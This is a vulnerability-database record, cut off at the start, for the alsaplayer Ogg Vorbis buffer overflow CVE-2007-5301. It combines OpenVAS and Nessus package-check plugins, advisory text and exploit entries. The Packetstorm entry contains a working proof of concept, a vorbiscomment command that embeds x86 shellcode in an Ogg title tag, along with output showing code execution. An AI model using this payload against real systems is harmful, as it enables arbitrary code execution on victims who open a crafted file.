((res = isdpkgvuln(pkg:\"alsaplayer-alsa\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-xosd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-daemon\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-jack\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-oss\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-common\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-esd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-nas\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-gtk\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer0\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer-dev\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-text\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2017-10-29T13:42:09", "references": ["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446034", "http://www.debian.org/security/2008/dsa-1538"], "pluginID": "31808", "edition": 2, "description": "Erik Sjolund discovered a buffer overflow vulnerability in the Ogg Vorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a maliciously crafted Vorbis file could lead to the execution of arbitrary code.", "reporter": "Tenable", "published": "2008-04-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "nessus", "title": "Debian DSA-1538-1 : alsaplayer - buffer overrun", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:alsaplayer"], "modified": "2016-05-26T00:00:00", "id": "DEBIAN_DSA-1538.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=31808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1538. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31808);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/05/26 15:53:37 $\");\n\n script_cve_id(\"CVE-2007-5301\");\n script_xref(name:\"DSA\", value:\"1538\");\n\n script_name(english:\"Debian DSA-1538-1 : alsaplayer - buffer overrun\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Erik Sjolund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously crafted Vorbis file could lead to the execution of\narbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2008/dsa-1538\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the alsaplayer packages.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:alsaplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-alsa\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-common\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-daemon\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-esd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-gtk\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-jack\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-nas\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-oss\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-text\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-xosd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer-dev\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer0\", reference:\"0.99.76-9+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:16", "references": [], "edition": 1, "description": "", "reporter": "whats@wekk.net", "published": "2008-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "alsaplayer-overflow.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "href": "https://packetstormsecurity.com/files/65385/alsaplayer-overflow.txt.html", "id": "PACKETSTORM:65385", "sourceData": "`I have released this exploit for the alsaplayer bug CVE-2007-5301. \n \nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ \n \nWith my modified version of vorbiscomment, you can generate a ogg exploit like this: \n \nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7 \n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e \n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b \n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34 \n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \n \nThen, if you plays the file with the vulnerable version: \n \nwhats@debian:~$ alsaplayer exploit.ogg \nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) \n \nThis was tested with the debian etch packages. \n \n- whats \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/65385/alsaplayer-overflow.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:48:10", "osvdbidlist": ["41643"], "references": [], "description": "AlsaPlayer 0.99.x Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability. CVE-2007-5301. Dos exploit for linux platform", "edition": 1, "reporter": "Erik", "published": "2007-10-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2007-10-08T00:00:00", "id": "EDB-ID:30648", "href": "https://www.exploit-db.com/exploits/30648/", "sourceData": "source: http://www.securityfocus.com/bid/25969/info\r\n\r\nAlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.\r\n\r\nExploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected application.\r\n\r\nThis issue affects versions prior to AlsaPlayer 0.99.80-rc3. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30648/"}]}}
